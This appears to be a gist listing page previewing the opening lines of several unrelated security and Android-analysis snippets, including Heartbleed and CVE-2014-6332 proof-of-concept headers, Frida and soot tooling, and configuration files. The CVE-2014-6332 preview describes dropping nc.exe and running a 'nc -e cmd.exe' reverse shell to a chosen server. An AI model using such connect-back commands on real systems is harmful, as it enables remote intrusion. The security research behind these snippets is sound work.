This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
# The author disclaims copyright to this source code. | |
import sys | |
import struct | |
import socket | |
import time | |
import select |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* Collin's Dynamic Dalvik Instrumentation Toolkit for Android | |
* Collin Mulliner <collin[at]mulliner.org> | |
* | |
* (c) 2012,2013 | |
* | |
* License: LGPL v2.1 | |
* | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Path to your oh-my-zsh installation. | |
export ZSH=$HOME/.oh-my-zsh | |
# Set name of the theme to load. | |
# Look in ~/.oh-my-zsh/themes/ | |
# Optionally, if you set this to "random", it'll load a random theme each | |
# time that oh-my-zsh is loaded. | |
ZSH_THEME="ys" | |
# Example aliases |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
I/dalvikvm( 705): Ljava/lang/Long; | |
I/dalvikvm( 705): Landroid/graphics/LightingColorFilter; | |
I/dalvikvm( 705): Landroid/os/StrictMode$LogStackTrace; | |
I/dalvikvm( 705): Landroid/net/Uri$Part; | |
I/dalvikvm( 705): Lcom/android/internal/app/AlertController$ButtonHandler; | |
I/dalvikvm( 705): Landroid/widget/QuickContactBadge$QueryHandler; | |
I/dalvikvm( 705): Ljava/security/KeyFactorySpi; | |
I/dalvikvm( 705): Landroid/util/StateSet; | |
I/dalvikvm( 705): Lcom/android/org/bouncycastle/asn1/x509/AlgorithmIdentifier; | |
I/dalvikvm( 705): Ljava/util/concurrent/Executors$DefaultThreadFactory; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import OpenSSL | |
from OpenSSL.crypto import * | |
#assume you've already generated client.cer | |
#extract CERT.RSA | |
#openssl pkcs7 -in CERT.RSA -print_certs -inform DER -out cert.cer : CA cert isolated from RSA | |
cacert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open('cert.cer','r').read()) | |
pk = OpenSSL.crypto.PKey() | |
pk.generate_key(OpenSSL.crypto.TYPE_RSA,1024) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import org.sireum.util._ | |
import org.sireum.jawa.MessageCenter._ | |
import org.sireum.amandroid.alir.reachingFactsAnalysis.AndroidReachingFactsAnalysisConfig | |
import org.sireum.jawa.util.Timer | |
import org.sireum.amandroid.security.apiMisuse.InterestingApiCollector | |
import org.sireum.jawa.MessageCenter._ | |
import org.sireum.amandroid.util.AndroidLibraryAPISummary | |
import org.sireum.amandroid.AppCenter | |
import org.sireum.jawa.alir.reachability.ReachabilityAnalysis | |
import org.sireum.jawa.JawaCodeSource |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<!-- | |
CVE-2014-6332 PoC to bypass IE protected mode if enabled (with localhost) then get shell | |
The PoC drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
'server_ip' and 'server_port' in javascript below determined the connect back target | |
Tested on | |
- IE11 + Windows 7 64-bit (EPM is off) | |
- IE11 + Windoes 8.1 64-bit (EPM is off) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
script = session.create_script(''' | |
Dalvik.perform(function () { | |
var Activity = Dalvik.use("com.example.myapp.MyActivity"); | |
Activity.hookMe.overload("java.lang.String").implementation = function () { | |
Activity.hookMe.overload("java.lang.String").call(args[0], "foo");//comment out this line won't crash | |
return "foo"; | |
}; | |
}); | |
''') | |
// This result in immediate crash |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
The MIT License (MIT) | |
Copyright (c) 2015 David Weinstein | |
Permission is hereby granted, free of charge, to any person obtaining a copy | |
of this software and associated documentation files (the "Software"), to deal | |
in the Software without restriction, including without limitation the rights | |
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | |
copies of the Software, and to permit persons to whom the Software is | |
furnished to do so, subject to the following conditions: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
java -cp soot.jar:app-debug.apk soot.tools.CFGViewer --graph=BriefBlockGraph -src-prec apk -android-jars /home/xxx/android-sdks/platforms/ -process-dir app-debug.apk -f J -allow-phantom-refs |
OlderNewer